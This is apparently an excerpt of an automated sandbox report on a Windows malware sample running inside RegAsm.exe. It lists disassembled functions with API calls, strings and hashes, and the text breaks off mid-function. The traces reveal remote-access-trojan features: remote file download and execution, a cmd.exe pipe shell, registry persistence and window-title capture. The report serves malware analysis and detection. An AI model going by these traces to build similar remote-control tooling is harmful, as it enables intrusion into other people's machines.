Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4

Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
RegCloseKey.KERNEL32(004660A4), ref: 004138AB

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798

Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9

Strings

, xrefs: 0044EE2E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65

Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409DFD

Strings

pQG, xrefs: 00409E2D

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID: pQG
API String ID: 176396367-3769108836
Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98

Function 00448BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24

Strings

LCMapStringEx, xrefs: 00448BCE

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99

Function 00448A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF

Strings

InitializeCriticalSectionEx, xrefs: 00448A9F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD

Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0044874F

Strings

FlsAlloc, xrefs: 0044872B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE

Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00438DA9

Strings

FlsAlloc, xrefs: 00438DA2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE

Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA

Strings

@, xrefs: 0041B7C0

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94

Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99

Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD

Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17

_free.LIBCMT ref: 0044EFD0
_free.LIBCMT ref: 0044F006

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48

Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

Function 00446185 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004461A6

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 365bd7ee977071c6a41bb961a5dd0d7818d2ba038ed0d9e6099f468a5701a404
Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
Opcode Fuzzy Hash: 365bd7ee977071c6a41bb961a5dd0d7818d2ba038ed0d9e6099f468a5701a404
Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F

Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404852
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E

Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18

Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0041BAB8
GetWindowTextW.USER32 ref: 0041BACB

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4

Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F

Function 0043AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0043AA70

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A

Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA

Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

std::_Deallocate.LIBCONCRT ref: 00402E2B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Deallocatestd::_
String ID:
API String ID: 1323251999-0
Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647

Function 00426CC8 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00426CD2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26

Function 00426CB1 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00426CBB

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725

Non-executed Functions

Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32 ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000), ref: 0040873A

Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7

Strings

Deleted file: , xrefs: 00407DC8
open, xrefs: 00408191
Unable to rename file!, xrefs: 00408413
XPG, xrefs: 00407DED
Unable to delete: , xrefs: 00407E07
XPG, xrefs: 004082E7
Browsing directory: , xrefs: 00408238
NG, xrefs: 00407CE5
Downloaded file: , xrefs: 0040802E
Executing file: , xrefs: 004081AD
(PG, xrefs: 004081F2
Downloading file: , xrefs: 00407F7D
XPG, xrefs: 00408718
XPG, xrefs: 00408430
Failed to download file: , xrefs: 004080A5

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
API String ID: 1067849700-181434739
Opcode ID: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
Opcode Fuzzy Hash: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B

Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

0lG, xrefs: 00405988
SystemDrive, xrefs: 00405761
0lG, xrefs: 00405954
0lG, xrefs: 0040585A
kG, xrefs: 004057DB
cmd.exe, xrefs: 0040574D
0lG, xrefs: 00405A2D
0lG, xrefs: 004056D0

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
API String ID: 2994406822-18413064
Opcode ID: 2bd343f2308bd01e46d13ee3107a7b8f798e16a4f39414714add75d6e18d8c9e
Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
Opcode Fuzzy Hash: 2bd343f2308bd01e46d13ee3107a7b8f798e16a4f39414714add75d6e18d8c9e
Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D

Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412106

